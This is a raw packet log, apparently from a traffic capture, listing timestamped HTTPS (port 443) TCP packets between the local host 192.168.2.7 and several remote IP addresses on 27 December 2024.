                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.938560963 CET49900443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.938576937 CET4434990023.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.938900948 CET4434990023.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.939852953 CET49900443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.939917088 CET4434990023.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:39.992865086 CET49900443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.296972990 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.298573971 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.299283981 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.299289942 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.302196980 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.302201986 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.302386045 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.302405119 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.302578926 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.302584887 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.304572105 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.304590940 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.304713011 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.304724932 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.304778099 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.304788113 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.304888010 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.304903984 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.304954052 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.304966927 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.304986954 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.304994106 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.305011034 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.305022001 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.305289030 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.305303097 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.305372000 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.305383921 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.305402040 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.305413961 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.543277025 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.543318033 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.543330908 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.583365917 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.706178904 CET49903443192.168.2.751.104.15.253
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.706217051 CET4434990351.104.15.253192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.706346035 CET49903443192.168.2.751.104.15.253
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.706533909 CET49903443192.168.2.751.104.15.253
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.706549883 CET4434990351.104.15.253192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.775007010 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.775186062 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.775218010 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.775357008 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.775388956 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.776557922 CET4434988118.238.49.74192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.776642084 CET4434988118.238.49.74192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.776689053 CET49881443192.168.2.718.238.49.74
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.777618885 CET49881443192.168.2.718.238.49.74
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.777632952 CET4434988118.238.49.74192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.782151937 CET49905443192.168.2.718.238.49.74
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.782202959 CET4434990518.238.49.74192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.782284021 CET49905443192.168.2.718.238.49.74
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.782387972 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.782406092 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.782529116 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.782555103 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.782633066 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.782644033 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.783173084 CET49905443192.168.2.718.238.49.74
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.783188105 CET4434990518.238.49.74192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.783598900 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.783607960 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.783627987 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.783643007 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.783678055 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.783694983 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.783723116 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.783742905 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.783961058 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.784022093 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.784143925 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.784169912 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.784245968 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.784261942 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.785677910 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.786180019 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.786226988 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.786669970 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.786715984 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.827328920 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.834112883 CET4434987620.110.205.119192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.834197998 CET4434987620.110.205.119192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.834249973 CET49876443192.168.2.720.110.205.119
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.900574923 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.900710106 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.900742054 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.900876999 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.900902987 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.902405024 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.902558088 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.902571917 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.902615070 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.904616117 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.951498032 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.951515913 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.951554060 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.951567888 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.951606989 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.951615095 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.951638937 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.951647997 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.951678991 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.951678991 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.951698065 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.951739073 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.951747894 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.951765060 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.952883959 CET49876443192.168.2.720.110.205.119
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.952909946 CET4434987620.110.205.119192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.975794077 CET44349894188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:40.975866079 CET49894443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.026493073 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.026500940 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.026520967 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.028034925 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.028081894 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.028177023 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.028242111 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.028286934 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.028301001 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.028311014 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.028323889 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.028330088 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.028336048 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.028351068 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.028386116 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.028412104 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.028425932 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.030402899 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.030419111 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.030524015 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.030541897 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.030635118 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.030683994 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.030936956 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.031836987 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.031883001 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.031985044 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.032046080 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.032253981 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.032291889 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.033206940 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.033365011 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.033437014 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.033458948 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.033459902 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.033483982 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.033529043 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.033618927 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.033627987 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.033655882 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.033663034 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.033689022 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.047456026 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.047475100 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.047588110 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.047612906 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.047622919 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.047671080 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.047677040 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.047699928 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.047708035 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.047713041 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.047718048 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.047732115 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.047736883 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.047763109 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.047771931 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.047791958 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.047885895 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.047908068 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.047929049 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.047939062 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.047986984 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.048063040 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.095329046 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.134697914 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.134829998 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.134876013 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.135023117 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.139676094 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.139781952 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.139799118 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.139967918 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.139990091 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.140034914 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.140058041 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.140069008 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.140810013 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.140853882 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.141038895 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.301584005 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.301584005 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.301584005 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.301603079 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.301659107 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.301677942 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.301737070 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.301749945 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.301846981 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.301856995 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.301872969 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.301918983 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.301929951 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.301938057 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.301950932 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.301964998 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.301980972 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.301997900 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.302002907 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.302059889 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.302129984 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.302319050 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.302324057 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.302356958 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.302475929 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.302508116 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.302521944 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.302546978 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.302683115 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.302711964 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.302719116 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.302738905 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.302851915 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.302881002 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.302891016 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.302907944 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.302926064 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.303050041 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.303059101 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.303091049 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.303126097 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.303159952 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.303195000 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.303214073 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.303217888 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.303255081 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.303267002 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.303292036 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.303303003 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.303340912 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.303571939 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.303621054 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.303628922 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.303643942 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.303680897 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.303699017 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.303744078 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.303751945 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.303761005 CET49902443192.168.2.7188.245.216.205
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.337040901 CET44349902188.245.216.205192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:41.337106943 CET44349902188.245.216.205192.168.2.7
